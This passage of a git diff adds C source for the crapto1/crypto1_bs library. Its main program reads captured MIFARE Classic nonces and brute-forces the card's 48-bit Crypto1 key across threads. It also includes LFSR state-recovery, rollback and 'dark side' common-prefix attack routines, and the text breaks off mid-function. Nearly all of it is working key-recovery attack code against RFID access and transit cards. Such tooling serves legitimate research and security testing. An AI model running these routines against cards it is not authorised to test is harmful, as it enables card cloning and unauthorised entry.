#define _GNU_SOURCE
|
||||
#include "craptev1.h"
|
||||
|
||||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
#include <sched.h>
|
||||
#include <signal.h>
|
||||
#include <sys/mman.h>
|
||||
#include <linux/futex.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <sys/sysinfo.h>
|
||||
|
||||
uint32_t **job;
|
||||
uint64_t origsize;
|
||||
void progress(int sig){
|
||||
uint64_t left = craptev1_sizeof_space(job);
|
||||
double p = (origsize - left) * 100.0 / origsize;
|
||||
|
||||
printf("\x1b[2K\x1b[G""%.2f%% done", p);
|
||||
fflush(stdout);
|
||||
alarm(1);
|
||||
}
|
||||
void progress_init(uint32_t **space){
|
||||
origsize = craptev1_sizeof_space(job = space);
|
||||
signal(SIGALRM, progress);
|
||||
alarm(1);
|
||||
}
|
||||
|
||||
int active;
|
||||
int tmain(void *task){
|
||||
uint64_t key = craptev1_search_partition(task);
|
||||
if(key != -1) {
|
||||
alarm(0);
|
||||
printf("\nFOUND: %"PRIx64"\n", key);
|
||||
exit(1);
|
||||
}
|
||||
__sync_sub_and_fetch(&active, 1);
|
||||
syscall(__NR_futex, &active, FUTEX_WAKE, 1);
|
||||
syscall(__NR_exit, 0);
|
||||
return 0;
|
||||
}
|
||||
|
||||
#define CLONE_FLAGS (CLONE_SIGHAND | CLONE_FS | CLONE_VM | CLONE_FILES | CLONE_THREAD | CLONE_SYSVSEM)
|
||||
void multithread(uint32_t **space, int maxthread) {
|
||||
char *stack;
|
||||
int j;
|
||||
|
||||
for(j = 0; space[j * 5]; ++j) {
|
||||
__sync_add_and_fetch(&active, 1);
|
||||
stack = mmap(0, 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
|
||||
clone(tmain, stack + 4092, CLONE_FLAGS, space + j * 5);
|
||||
syscall(__NR_futex, &active, FUTEX_WAIT, maxthread, 0);
|
||||
}
|
||||
while((j = active))
|
||||
syscall(__NR_futex, &active, FUTEX_WAIT, j, 0);
|
||||
}
|
||||
|
||||
uint64_t *readnonces(char* fname) {
|
||||
int i, j, r;
|
||||
FILE *f = fopen(fname, "r");
|
||||
uint64_t *nonces = malloc(sizeof (uint64_t) << 24);
|
||||
uint32_t byte;
|
||||
char parities;
|
||||
|
||||
for(i = 0; !feof(f); ++i) {
|
||||
for(j = nonces[i] = 0; j < 4; ++j) {
|
||||
r = fscanf(f, "%02x%c ", &byte, &parities);
|
||||
if(r != 2) {
|
||||
fprintf(stderr, "Input parse error pos:%ld\n", ftell(f));
|
||||
fflush(stderr);
|
||||
abort();
|
||||
}
|
||||
parities = (parities == '!') ^ parity(byte);
|
||||
nonces[i] |= byte << 8 * j;
|
||||
nonces[i] |= ((uint64_t)parities) << (32 + j * 8);
|
||||
}
|
||||
}
|
||||
nonces[i] = -1;
|
||||
fclose(f);
|
||||
return nonces;
|
||||
}
|
||||
void usage(char *exename) {
|
||||
printf("Usage:\n\t%s -f [filename] -u [uid] [-t treshold] [-n threads]\n\n", exename);
|
||||
_exit(0);
|
||||
}
|
||||
int main(int argc, char**argv) {
|
||||
uint64_t *nonces = 0, c;
|
||||
uint32_t **space, uid = 0, tresh = 95;
|
||||
int option, max_thread = get_nprocs_conf();
|
||||
|
||||
while((option = getopt(argc, argv, "f:u:n:t:")) != -1 )
|
||||
switch(option) {
|
||||
case 'f': nonces = readnonces(optarg); break;
|
||||
case 'u': uid = strtoul(optarg, 0, 16); break;
|
||||
case 'n': max_thread = atoi(optarg); break;
|
||||
case 't': tresh = atoi(optarg); break;
|
||||
default: usage(argv[0]);
|
||||
}
|
||||
if(optind != argc || nonces == 0)
|
||||
usage(*argv);
|
||||
space = craptev1_get_space(nonces, tresh, uid);
|
||||
c = craptev1_sizeof_space(space);
|
||||
printf("Leftover complexity: %"PRIx64"\n", c);
|
||||
|
||||
progress_init(space);
|
||||
multithread(space, max_thread);
|
||||
craptev1_destroy_space(space);
|
||||
|
||||
return 0;
|
||||
}
|
479
crypto1_bs/crapto1-v3.3/crapto1.c
Executable file
479
crypto1_bs/crapto1-v3.3/crapto1.c
Executable file
@ -0,0 +1,479 @@
|
||||
/* crapto1.c
|
||||
|
||||
This program is free software; you can redistribute it and/or
|
||||
modify it under the terms of the GNU General Public License
|
||||
as published by the Free Software Foundation; either version 2
|
||||
of the License, or (at your option) any later version.
|
||||
|
||||
This program is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
GNU General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU General Public License
|
||||
along with this program; if not, write to the Free Software
|
||||
Foundation, Inc., 51 Franklin Street, Fifth Floor,
|
||||
Boston, MA 02110-1301, US$
|
||||
|
||||
Copyright (C) 2008-2014 bla <blapost@gmail.com>
|
||||
*/
|
||||
#include "crapto1.h"
|
||||
#include <stdlib.h>
|
||||
|
||||
#if !defined LOWMEM && defined __GNUC__
|
||||
static uint8_t filterlut[1 << 20];
|
||||
static void __attribute__((constructor)) fill_lut()
|
||||
{
|
||||
uint32_t i;
|
||||
for(i = 0; i < 1 << 20; ++i)
|
||||
filterlut[i] = filter(i);
|
||||
}
|
||||
#define filter(x) (filterlut[(x) & 0xfffff])
|
||||
#endif
|
||||
|
||||
static void quicksort(uint32_t* const start, uint32_t* const stop)
|
||||
{
|
||||
uint32_t *it = start + 1, *rit = stop, t;
|
||||
|
||||
if(it > rit)
|
||||
return;
|
||||
|
||||
while(it < rit)
|
||||
if(*it <= *start)
|
||||
++it;
|
||||
else if(*rit > *start)
|
||||
--rit;
|
||||
else
|
||||
t = *it, *it = *rit, *rit = t;
|
||||
|
||||
if(*rit >= *start)
|
||||
--rit;
|
||||
if(rit != start)
|
||||
t = *rit, *rit = *start, *start = t;
|
||||
|
||||
quicksort(start, rit - 1);
|
||||
quicksort(rit + 1, stop);
|
||||
}
|
||||
/** binsearch
|
||||
* Binary search for the first occurence of *stop's MSB in sorted [start,stop]
|
||||
*/
|
||||
static inline uint32_t* binsearch(uint32_t *start, uint32_t *stop)
|
||||
{
|
||||
uint32_t mid, val = *stop & 0xff000000;
|
||||
while(start != stop)
|
||||
if(start[mid = (stop - start) >> 1] > val)
|
||||
stop = &start[mid];
|
||||
else
|
||||
start += mid + 1;
|
||||
|
||||
return start;
|
||||
}
|
||||
|
||||
/** update_contribution
|
||||
* helper, calculates the partial linear feedback contributions and puts in MSB
|
||||
*/
|
||||
static inline void
|
||||
update_contribution(uint32_t *item, const uint32_t mask1, const uint32_t mask2)
|
||||
{
|
||||
uint32_t p = *item >> 25;
|
||||
|
||||
p = p << 1 | parity(*item & mask1);
|
||||
p = p << 1 | parity(*item & mask2);
|
||||
*item = p << 24 | (*item & 0xffffff);
|
||||
}
|
||||
|
||||
/** extend_table
|
||||
* using a bit of the keystream extend the table of possible lfsr states
|
||||
*/
|
||||
static inline void
|
||||
extend_table(uint32_t *tbl, uint32_t **end, int bit, int m1, int m2, uint32_t in)
|
||||
{
|
||||
in <<= 24;
|
||||
for(*tbl <<= 1; tbl <= *end; *++tbl <<= 1)
|
||||
if(filter(*tbl) ^ filter(*tbl | 1)) {
|
||||
*tbl |= filter(*tbl) ^ bit;
|
||||
update_contribution(tbl, m1, m2);
|
||||
*tbl ^= in;
|
||||
} else if(filter(*tbl) == bit) {
|
||||
*++*end = tbl[1];
|
||||
tbl[1] = tbl[0] | 1;
|
||||
update_contribution(tbl, m1, m2);
|
||||
*tbl++ ^= in;
|
||||
update_contribution(tbl, m1, m2);
|
||||
*tbl ^= in;
|
||||
} else
|
||||
*tbl-- = *(*end)--;
|
||||
}
|
||||
/** extend_table_simple
|
||||
* using a bit of the keystream extend the table of possible lfsr states
|
||||
*/
|
||||
static inline void extend_table_simple(uint32_t *tbl, uint32_t **end, int bit)
|
||||
{
|
||||
for(*tbl <<= 1; tbl <= *end; *++tbl <<= 1)
|
||||
if(filter(*tbl) ^ filter(*tbl | 1))
|
||||
*tbl |= filter(*tbl) ^ bit;
|
||||
else if(filter(*tbl) == bit) {
|
||||
*++*end = *++tbl;
|
||||
*tbl = tbl[-1] | 1;
|
||||
} else
|
||||
*tbl-- = *(*end)--;
|
||||
}
|
||||
/** recover
|
||||
* recursively narrow down the search space, 4 bits of keystream at a time
|
||||
*/
|
||||
static struct Crypto1State*
|
||||
recover(uint32_t *o_head, uint32_t *o_tail, uint32_t oks,
|
||||
uint32_t *e_head, uint32_t *e_tail, uint32_t eks, int rem,
|
||||
struct Crypto1State *sl, uint32_t in)
|
||||
{
|
||||
uint32_t *o, *e, i;
|
||||
|
||||
if(rem == -1) {
|
||||
for(e = e_head; e <= e_tail; ++e) {
|
||||
*e = *e << 1 ^ parity(*e & LF_POLY_EVEN) ^ !!(in & 4);
|
||||
for(o = o_head; o <= o_tail; ++o, ++sl) {
|
||||
sl->even = *o;
|
||||
sl->odd = *e ^ parity(*o & LF_POLY_ODD);
|
||||
sl[1].odd = sl[1].even = 0;
|
||||
}
|
||||
}
|
||||
return sl;
|
||||
}
|
||||
|
||||
for(i = 0; i < 4 && rem--; i++) {
|
||||
oks >>= 1;
|
||||
eks >>= 1;
|
||||
in >>= 2;
|
||||
extend_table(o_head, &o_tail, oks & 1, LF_POLY_EVEN << 1 | 1,
|
||||
LF_POLY_ODD << 1, 0);
|
||||
if(o_head > o_tail)
|
||||
return sl;
|
||||
|
||||
extend_table(e_head, &e_tail, eks & 1, LF_POLY_ODD,
|
||||
LF_POLY_EVEN << 1 | 1, in & 3);
|
||||
if(e_head > e_tail)
|
||||
return sl;
|
||||
}
|
||||
|
||||
quicksort(o_head, o_tail);
|
||||
quicksort(e_head, e_tail);
|
||||
|
||||
while(o_tail >= o_head && e_tail >= e_head)
|
||||
if(((*o_tail ^ *e_tail) >> 24) == 0) {
|
||||
o_tail = binsearch(o_head, o = o_tail);
|
||||
e_tail = binsearch(e_head, e = e_tail);
|
||||
sl = recover(o_tail--, o, oks,
|
||||
e_tail--, e, eks, rem, sl, in);
|
||||
}
|
||||
else if(*o_tail > *e_tail)
|
||||
o_tail = binsearch(o_head, o_tail) - 1;
|
||||
else
|
||||
e_tail = binsearch(e_head, e_tail) - 1;
|
||||
|
||||
return sl;
|
||||
}
|
||||
/** lfsr_recovery
|
||||
* recover the state of the lfsr given 32 bits of the keystream
|
||||
* additionally you can use the in parameter to specify the value
|
||||
* that was fed into the lfsr at the time the keystream was generated
|
||||
*/
|
||||
struct Crypto1State* lfsr_recovery32(uint32_t ks2, uint32_t in)
|
||||
{
|
||||
struct Crypto1State *statelist;
|
||||
uint32_t *odd_head = 0, *odd_tail = 0, oks = 0;
|
||||
uint32_t *even_head = 0, *even_tail = 0, eks = 0;
|
||||
int i;
|
||||
|
||||
for(i = 31; i >= 0; i -= 2)
|
||||
oks = oks << 1 | BEBIT(ks2, i);
|
||||
for(i = 30; i >= 0; i -= 2)
|
||||
eks = eks << 1 | BEBIT(ks2, i);
|
||||
|
||||
odd_head = odd_tail = malloc(sizeof(uint32_t) << 21);
|
||||
even_head = even_tail = malloc(sizeof(uint32_t) << 21);
|
||||
statelist = malloc(sizeof(struct Crypto1State) << 18);
|
||||
if(!odd_tail-- || !even_tail-- || !statelist) {
|
||||
free(statelist);
|
||||
statelist = 0;
|
||||
goto out;
|
||||
}
|
||||
|
||||
statelist->odd = statelist->even = 0;
|
||||
|
||||
for(i = 1 << 20; i >= 0; --i) {
|
||||
if(filter(i) == (oks & 1))
|
||||
*++odd_tail = i;
|
||||
if(filter(i) == (eks & 1))
|
||||
*++even_tail = i;
|
||||
}
|
||||
|
||||
for(i = 0; i < 4; i++) {
|
||||
extend_table_simple(odd_head, &odd_tail, (oks >>= 1) & 1);
|
||||
extend_table_simple(even_head, &even_tail, (eks >>= 1) & 1);
|
||||
}
|
||||
|
||||
in = (in >> 16 & 0xff) | (in << 16) | (in & 0xff00);
|
||||
recover(odd_head, odd_tail, oks,
|
||||
even_head, even_tail, eks, 11, statelist, in << 1);
|
||||
|
||||
out:
|
||||
free(odd_head);
|
||||
free(even_head);
|
||||
return statelist;
|
||||
}
|
||||
|
||||
static const uint32_t S1[] = { 0x62141, 0x310A0, 0x18850, 0x0C428, 0x06214,
|
||||
0x0310A, 0x85E30, 0xC69AD, 0x634D6, 0xB5CDE, 0xDE8DA, 0x6F46D, 0xB3C83,
|
||||
0x59E41, 0xA8995, 0xD027F, 0x6813F, 0x3409F, 0x9E6FA};
|
||||
static const uint32_t S2[] = { 0x3A557B00, 0x5D2ABD80, 0x2E955EC0, 0x174AAF60,
|
||||
0x0BA557B0, 0x05D2ABD8, 0x0449DE68, 0x048464B0, 0x42423258, 0x278192A8,
|
||||
0x156042D0, 0x0AB02168, 0x43F89B30, 0x61FC4D98, 0x765EAD48, 0x7D8FDD20,
|
||||
0x7EC7EE90, 0x7F63F748, 0x79117020};
|
||||
static const uint32_t T1[] = {
|
||||
0x4F37D, 0x279BE, 0x97A6A, 0x4BD35, 0x25E9A, 0x12F4D, 0x097A6, 0x80D66,
|
||||
0xC4006, 0x62003, 0xB56B4, 0x5AB5A, 0xA9318, 0xD0F39, 0x6879C, 0xB057B,
|
||||
0x582BD, 0x2C15E, 0x160AF, 0x8F6E2, 0xC3DC4, 0xE5857, 0x72C2B, 0x39615,
|
||||
0x98DBF, 0xC806A, 0xE0680, 0x70340, 0x381A0, 0x98665, 0x4C332, 0xA272C};
|
||||
static const uint32_t T2[] = { 0x3C88B810, 0x5E445C08, 0x2982A580, 0x14C152C0,
|
||||
0x4A60A960, 0x253054B0, 0x52982A58, 0x2FEC9EA8, 0x1156C4D0, 0x08AB6268,
|
||||
0x42F53AB0, 0x217A9D58, 0x161DC528, 0x0DAE6910, 0x46D73488, 0x25CB11C0,
|
||||
0x52E588E0, 0x6972C470, 0x34B96238, 0x5CFC3A98, 0x28DE96C8, 0x12CFC0E0,
|
||||
0x4967E070, 0x64B3F038, 0x74F97398, 0x7CDC3248, 0x38CE92A0, 0x1C674950,
|
||||
0x0E33A4A8, 0x01B959D0, 0x40DCACE8, 0x26CEDDF0};
|
||||
static const uint32_t C1[] = { 0x846B5, 0x4235A, 0x211AD};
|
||||
static const uint32_t C2[] = { 0x1A822E0, 0x21A822E0, 0x21A822E0};
|
||||
/** Reverse 64 bits of keystream into possible cipher states
|
||||
* Variation mentioned in the paper. Somewhat optimized version
|
||||
*/
|
||||
struct Crypto1State* lfsr_recovery64(uint32_t ks2, uint32_t ks3)
|
||||
{
|
||||
struct Crypto1State *statelist, *sl;
|
||||
uint8_t oks[32], eks[32], hi[32];
|
||||
uint32_t low = 0, win = 0;
|
||||
uint32_t *tail, table[1 << 16];
|
||||
int i, j;
|
||||
|
||||
sl = statelist = malloc(sizeof(struct Crypto1State) << 4);
|
||||
if(!sl)
|
||||
return 0;
|
||||
sl->odd = sl->even = 0;
|
||||
|
||||
for(i = 30; i >= 0; i -= 2) {
|
||||
oks[i >> 1] = BEBIT(ks2, i);
|
||||
oks[16 + (i >> 1)] = BEBIT(ks3, i);
|
||||
}
|
||||
for(i = 31; i >= 0; i -= 2) {
|
||||
eks[i >> 1] = BEBIT(ks2, i);
|
||||
eks[16 + (i >> 1)] = BEBIT(ks3, i);
|
||||
}
|
||||
|
||||
for(i = 0xfffff; i >= 0; --i) {
|
||||
if (filter(i) != oks[0])
|
||||
continue;
|
||||
|
||||
*(tail = table) = i;
|
||||
for(j = 1; tail >= table && j < 29; ++j)
|
||||
extend_table_simple(table, &tail, oks[j]);
|
||||
|
||||
if(tail < table)
|
||||
continue;
|
||||
|
||||
for(j = 0; j < 19; ++j)
|
||||
low = low << 1 | parity(i & S1[j]);
|
||||
for(j = 0; j < 32; ++j)
|
||||
hi[j] = parity(i & T1[j]);
|
||||
|
||||
for(; tail >= table; --tail) {
|
||||
for(j = 0; j < 3; ++j) {
|
||||
*tail = *tail << 1;
|
||||
*tail |= parity((i & C1[j]) ^ (*tail & C2[j]));
|
||||
if(filter(*tail) != oks[29 + j])
|
||||
goto continue2;
|
||||
}
|
||||
|
||||
for(j = 0; j < 19; ++j)
|
||||
win = win << 1 | parity(*tail & S2[j]);
|
||||
|
||||
win ^= low;
|
||||
for(j = 0; j < 32; ++j) {
|
||||
win = win << 1 ^ hi[j] ^ parity(*tail & T2[j]);
|
||||
if(filter(win) != eks[j])
|
||||
goto continue2;
|
||||
}
|
||||
|
||||
*tail = *tail << 1 | parity(LF_POLY_EVEN & *tail);
|
||||
sl->odd = *tail ^ parity(LF_POLY_ODD & win);
|
||||
sl->even = win;
|
||||
++sl;
|
||||
sl->odd = sl->even = 0;
|
||||
continue2:;
|
||||
}
|
||||
}
|
||||
return statelist;
|
||||
}
|
||||
|
||||
/** lfsr_rollback_bit
|
||||
* Rollback the shift register in order to get previous states
|
||||
*/
|
||||
uint8_t lfsr_rollback_bit(struct Crypto1State *s, uint32_t in, int fb)
|
||||
{
|
||||
int out;
|
||||
uint8_t ret;
|
||||
uint32_t t;
|
||||
|
||||
s->odd &= 0xffffff;
|
||||
t = s->odd, s->odd = s->even, s->even = t;
|
||||
|
||||
out = s->even & 1;
|
||||
out ^= LF_POLY_EVEN & (s->even >>= 1);
|
||||
out ^= LF_POLY_ODD & s->odd;
|
||||
out ^= !!in;
|
||||
out ^= (ret = filter(s->odd)) & !!fb;
|
||||
|
||||
s->even |= parity(out) << 23;
|
||||
return ret;
|
||||
}
|
||||
/** lfsr_rollback_byte
|
||||
* Rollback the shift register in order to get previous states
|
||||
*/
|
||||
uint8_t lfsr_rollback_byte(struct Crypto1State *s, uint32_t in, int fb)
|
||||
{
|
||||
int i, ret = 0;
|
||||
for (i = 7; i >= 0; --i)
|
||||
ret |= lfsr_rollback_bit(s, BIT(in, i), fb) << i;
|
||||
return ret;
|
||||
}
|
||||
/** lfsr_rollback_word
|
||||
* Rollback the shift register in order to get previous states
|
||||
*/
|
||||
uint32_t lfsr_rollback_word(struct Crypto1State *s, uint32_t in, int fb)
|
||||
{
|
||||
int i;
|
||||
uint32_t ret = 0;
|
||||
for (i = 31; i >= 0; --i)
|
||||
ret |= lfsr_rollback_bit(s, BEBIT(in, i), fb) << (i ^ 24);
|
||||
return ret;
|
||||
}
|
||||
|
||||
/** nonce_distance
|
||||
* x,y valid tag nonces, then prng_successor(x, nonce_distance(x, y)) = y
|
||||
*/
|
||||
static uint16_t *dist = 0;
|
||||
int nonce_distance(uint32_t from, uint32_t to)
|
||||
{
|
||||
uint16_t x, i;
|
||||
if(!dist) {
|
||||
dist = malloc(2 << 16);
|
||||
if(!dist)
|
||||
return -1;
|
||||
for (x = i = 1; i; ++i) {
|
||||
dist[(x & 0xff) << 8 | x >> 8] = i;
|
||||
x = x >> 1 | (x ^ x >> 2 ^ x >> 3 ^ x >> 5) << 15;
|
||||
}
|
||||
}
|
||||
return (65535 + dist[to >> 16] - dist[from >> 16]) % 65535;
|
||||
}
|
||||
|
||||
|
||||
static uint32_t fastfwd[2][8] = {
|
||||
{ 0, 0x4BC53, 0xECB1, 0x450E2, 0x25E29, 0x6E27A, 0x2B298, 0x60ECB},
|
||||
{ 0, 0x1D962, 0x4BC53, 0x56531, 0xECB1, 0x135D3, 0x450E2, 0x58980}};
|
||||
/** lfsr_prefix_ks
|
||||
*
|
||||
* Is an exported helper function from the common prefix attack
|
||||
* Described in the "dark side" paper. It returns an -1 terminated array
|
||||
* of possible partial(21 bit) secret state.
|
||||
* The required keystream(ks) needs to contain the keystream that was used to
|
||||
* encrypt the NACK which is observed when varying only the 3 last bits of Nr
|
||||
* only correct iff [NR_3] ^ NR_3 does not depend on Nr_3
|
||||
*/
|
||||
uint32_t *lfsr_prefix_ks(uint8_t ks[8], int isodd)
|
||||
{
|
||||
uint32_t c, entry, *candidates = malloc(4 << 10);
|
||||
int i, size = 0, good;
|
||||
|
||||
if(!candidates)
|
||||
return 0;
|
||||
|
||||
for(i = 0; i < 1 << 21; ++i) {
|
||||
for(c = 0, good = 1; good && c < 8; ++c) {
|
||||
entry = i ^ fastfwd[isodd][c];
|
||||
good &= (BIT(ks[c], isodd) == filter(entry >> 1));
|
||||
good &= (BIT(ks[c], isodd + 2) == filter(entry));
|
||||
}
|
||||
if(good)
|
||||
candidates[size++] = i;
|
||||
}
|
||||
|
||||
candidates[size] = -1;
|
||||
|
||||
return candidates;
|
||||
}
|
||||
|
||||
/** check_pfx_parity
|
||||
* helper function which eliminates possible secret states using parity bits
|
||||
*/
|
||||
static struct Crypto1State*
|
||||
check_pfx_parity(uint32_t prefix, uint32_t rresp, uint8_t parities[8][8],
|
||||
uint32_t odd, uint32_t even, struct Crypto1State* sl)
|
||||
{
|
||||
uint32_t ks1, nr, ks2, rr, ks3, c, good = 1;
|
||||
|
||||
for(c = 0; good && c < 8; ++c) {
|
||||
sl->odd = odd ^ fastfwd[1][c];
|
||||
sl->even = even ^ fastfwd[0][c];
|
||||
|
||||
lfsr_rollback_bit(sl, 0, 0);
|
||||
lfsr_rollback_bit(sl, 0, 0);
|
||||
|
||||
ks3 = lfsr_rollback_bit(sl, 0, 0);
|
||||
ks2 = lfsr_rollback_word(sl, 0, 0);
|
||||
ks1 = lfsr_rollback_word(sl, prefix | c << 5, 1);
|
||||
|
||||
nr = ks1 ^ (prefix | c << 5);
|
||||
rr = ks2 ^ rresp;
|
||||
|
||||
good &= parity(nr & 0x000000ff) ^ parities[c][3] ^ BIT(ks2, 24);
|
||||
good &= parity(rr & 0xff000000) ^ parities[c][4] ^ BIT(ks2, 16);
|
||||
good &= parity(rr & 0x00ff0000) ^ parities[c][5] ^ BIT(ks2, 8);
|
||||
good &= parity(rr & 0x0000ff00) ^ parities[c][6] ^ BIT(ks2, 0);
|
||||
good &= parity(rr & 0x000000ff) ^ parities[c][7] ^ ks3;
|
||||
}
|
||||
|
||||
return sl + good;
|
||||
}
|
||||
|
||||
|
||||
/** lfsr_common_prefix
|
||||
* Implentation of the common prefix attack.
|
||||
*/
|
||||
struct Crypto1State*
|
||||
lfsr_common_prefix(uint32_t pfx, uint32_t rr, uint8_t ks[8], uint8_t par[8][8])
|
||||
{
|
||||
struct Crypto1State *statelist, *s;
|
||||
uint32_t *odd, *even, *o, *e, top;
|
||||
|
||||
odd = lfsr_prefix_ks(ks, 1);
|
||||
even = lfsr_prefix_ks(ks, 0);
|
||||
|
||||
s = statelist = malloc((sizeof *statelist) << 20);
|
||||
if(!s || !odd || !even) {
|
||||
free(statelist);
|
||||
statelist = 0;
|
||||
goto out;
|
||||
}
|
||||
|
||||
for(o = odd; *o + 1; ++o)
|
||||
for(e = even; *e + 1; ++e)
|
||||
for(top = 0; top < 64; ++top) {
|
||||
*o += 1 << 21;
|
||||
*e += (!(top & 7) + 1) << 21;
|
||||
s = check_pfx_parity(pfx, rr, par, *o, *e, s);
|
||||
}
|
||||
|
||||
s->odd = s->even = 0;
|
||||
out:
|
||||
free(odd);
|
||||
free(even);
|
||||
return statelist;
|
||||
}
|
93
crypto1_bs/crapto1-v3.3/crapto1.h
Executable file
93
crypto1_bs/crapto1-v3.3/crapto1.h
Executable file
@ -0,0 +1,93 @@
|
||||
/* crapto1.h
|
||||
|
||||
This program is free software; you can redistribute it and/or
|
||||
modify it under the terms of the GNU General Public License
|
||||
as published by the Free Software Foundation; either version 2
|
||||
of the License, or (at your option) any later version.
|
||||
|
||||
This program is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
GNU General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU General Public License
|
||||
along with this program; if not, write to the Free Software
|
||||
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
|
||||
MA 02110-1301, US$
|
||||
|
||||
Copyright (C) 2008-2014 bla <blapost@gmail.com>
|
||||
*/
|
||||
#ifndef CRAPTO1_INCLUDED
|
||||
#define CRAPTO1_INCLUDED
|
||||
#include <stdint.h>
|
||||
#ifdef __cplusplus
|
||||
extern "C" {
|
||||
#endif
|
||||
|
||||
struct Crypto1State {uint32_t odd, even;};
|
||||
struct Crypto1State* crypto1_create(uint64_t);
|
||||
void crypto1_destroy(struct Crypto1State*);
|
||||
void crypto1_get_lfsr(struct Crypto1State*, uint64_t*);
|
||||
uint8_t crypto1_bit(struct Crypto1State*, uint8_t, int);
|
||||
uint8_t crypto1_byte(struct Crypto1State*, uint8_t, int);
|
||||
uint32_t crypto1_word(struct Crypto1State*, uint32_t, int);
|
||||
uint32_t prng_successor(uint32_t x, uint32_t n);
|
||||
|
||||
struct Crypto1State* lfsr_recovery32(uint32_t ks2, uint32_t in);
|
||||
struct Crypto1State* lfsr_recovery64(uint32_t ks2, uint32_t ks3);
|
||||
uint32_t *lfsr_prefix_ks(uint8_t ks[8], int isodd);
|
||||
struct Crypto1State*
|
||||
lfsr_common_prefix(uint32_t pfx, uint32_t rr, uint8_t ks[8], uint8_t par[8][8]);
|
||||
|
||||
uint8_t lfsr_rollback_bit(struct Crypto1State* s, uint32_t in, int fb);
|
||||
uint8_t lfsr_rollback_byte(struct Crypto1State* s, uint32_t in, int fb);
|
||||
uint32_t lfsr_rollback_word(struct Crypto1State* s, uint32_t in, int fb);
|
||||
int nonce_distance(uint32_t from, uint32_t to);
|
||||
#define FOREACH_VALID_NONCE(N, FILTER, FSIZE)\
|
||||
uint32_t __n = 0,__M = 0, N = 0;\
|
||||
int __i;\
|
||||
for(; __n < 1 << 16; N = prng_successor(__M = ++__n, 16))\
|
||||
for(__i = FSIZE - 1; __i >= 0; __i--)\
|
||||
if(BIT(FILTER, __i) ^ parity(__M & 0xFF01))\
|
||||
break;\
|
||||
else if(__i)\
|
||||
__M = prng_successor(__M, (__i == 7) ? 48 : 8);\
|
||||
else
|
||||
|
||||
#define LF_POLY_ODD (0x29CE5C)
|
||||
#define LF_POLY_EVEN (0x870804)
|
||||
#define BIT(x, n) ((x) >> (n) & 1)
|
||||
#define BEBIT(x, n) BIT(x, (n) ^ 24)
|
||||
static inline int parity(uint32_t x)
|
||||
{
|
||||
#if !defined __i386__ || !defined __GNUC__
|
||||
x ^= x >> 16;
|
||||
x ^= x >> 8;
|
||||
x ^= x >> 4;
|
||||
return BIT(0x6996, x & 0xf);
|
||||
#else
|
||||
asm( "movl %1, %%eax\n"
|
||||
"mov %%ax, %%cx\n"
|
||||
"shrl $0x10, %%eax\n"
|
||||
"xor %%ax, %%cx\n"
|
||||
"xor %%ch, %%cl\n"
|
||||
"setpo %%al\n"
|
||||
"movzx %%al, %0\n": "=r"(x) : "r"(x): "eax","ecx");
|
||||
return x;
|
||||
#endif
|
||||
}
|
||||
static inline int filter(uint32_t const x)
|
||||
{
|
||||
uint32_t f;
|
||||
|
||||
f = 0xf22c0 >> (x & 0xf) & 16;
|
||||
f |= 0x6c9c0 >> (x >> 4 & 0xf) & 8;
|
||||
f |= 0x3c8b0 >> (x >> 8 & 0xf) & 4;
|
||||
f |= 0x1e458 >> (x >> 12 & 0xf) & 2;
|
||||
f |= 0x0d938 >> (x >> 16 & 0xf) & 1;
|
||||
return BIT(0xEC57E80A, f);
|
||||
}
|
||||
#ifdef __cplusplus
|
||||
}
|
||||
#endif
|
||||
#endif
|
93
crypto1_bs/crapto1-v3.3/crypto1.c
Executable file
93
crypto1_bs/crapto1-v3.3/crypto1.c
Executable file
@ -0,0 +1,93 @@
|
||||
/* crypto1.c
|
||||
|
||||
This program is free software; you can redistribute it and/or
|
||||
modify it under the terms of the GNU General Public License
|
||||
as published by the Free Software Foundation; either version 2
|
||||
of the License, or (at your option) any later version.
|
||||
|
||||
This program is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
GNU General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU General Public License
|
||||
along with this program; if not, write to the Free Software
|
||||
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
|
||||
MA 02110-1301, US
|
||||
|
||||
Copyright (C) 2008-2008 bla <blapost@gmail.com>
|
||||
*/
|
||||
#include "crapto1.h"
|
||||
#include <stdlib.h>
|
||||
|
||||
#define SWAPENDIAN(x)\
|
||||
(x = (x >> 8 & 0xff00ff) | (x & 0xff00ff) << 8, x = x >> 16 | x << 16)
|
||||
|
||||
struct Crypto1State * crypto1_create(uint64_t key)
|
||||
{
|
||||
struct Crypto1State *s = malloc(sizeof(*s));
|
||||
int i;
|
||||
|
||||
for(i = 47;s && i > 0; i -= 2) {
|
||||
s->odd = s->odd << 1 | BIT(key, (i - 1) ^ 7);
|
||||
s->even = s->even << 1 | BIT(key, i ^ 7);
|
||||
}
|
||||
return s;
|
||||
}
|
||||
void crypto1_destroy(struct Crypto1State *state)
|
||||
{
|
||||
free(state);
|
||||
}
|
||||
void crypto1_get_lfsr(struct Crypto1State *state, uint64_t *lfsr)
|
||||
{
|
||||
int i;
|
||||
for(*lfsr = 0, i = 23; i >= 0; --i) {
|
||||
*lfsr = *lfsr << 1 | BIT(state->odd, i ^ 3);
|
||||
*lfsr = *lfsr << 1 | BIT(state->even, i ^ 3);
|
||||
}
|
||||
}
|
||||
uint8_t crypto1_bit(struct Crypto1State *s, uint8_t in, int is_encrypted)
|
||||
{
|
||||
uint32_t feedin;
|
||||
uint8_t ret = filter(s->odd);
|
||||
|
||||
feedin = ret & !!is_encrypted;
|
||||
feedin ^= !!in;
|
||||
feedin ^= LF_POLY_ODD & s->odd;
|
||||
feedin ^= LF_POLY_EVEN & s->even;
|
||||
s->even = s->even << 1 | parity(feedin);
|
||||
|
||||
